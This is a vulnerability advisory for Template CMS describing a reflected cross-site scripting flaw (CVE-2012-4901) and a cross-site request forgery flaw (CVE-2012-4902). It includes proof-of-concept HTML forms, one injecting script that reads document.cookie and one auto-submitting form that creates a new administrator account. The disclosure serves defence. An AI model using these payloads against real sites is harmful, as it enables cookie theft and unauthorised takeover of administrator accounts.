1) Cross-Site Scripting (XSS) in Template CMS: CVE-2012-4901Input passed via the "themes_editor" POST parameter to /admin/index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:<formaction="http://[host]/admin/index.php?action=add_template&id=themes"method="post"><inputtype="hidden"name="themes_editor"value='</textarea><script>alert(document.cookie);</script>' /><inputtype="hidden"name="themes_editor_name"value='' /><inputtype="hidden"name="add_template"value='' /><inputtype="submit"id="btn"></form>

2) Сross-Site Request Forgery (CSRF) in Template CMS: CVE-2012-4902The application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to create new administrator or execute arbitrary PHP code.An attacker has to trick a logged-in administrator to visit a malicious web page containing the following code that will add a new administrator to the CMS:<formaction="http://[host]/admin/index.php?id=system&sub_id=users&action=add"method="post"><inputtype="hidden"name="login"value='newadmin' /><inputtype="hidden"name="password"value='password' /><inputtype="hidden"name="email"value='newadmin@mail.com' /><inputtype="hidden"name="role"value='admin' /><inputtype="hidden"name="register"value='' /><inputtype="submit"id="btn"></form><script> document.getElementById('btn').click();</scr ipt>

Have additional information to submit? Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.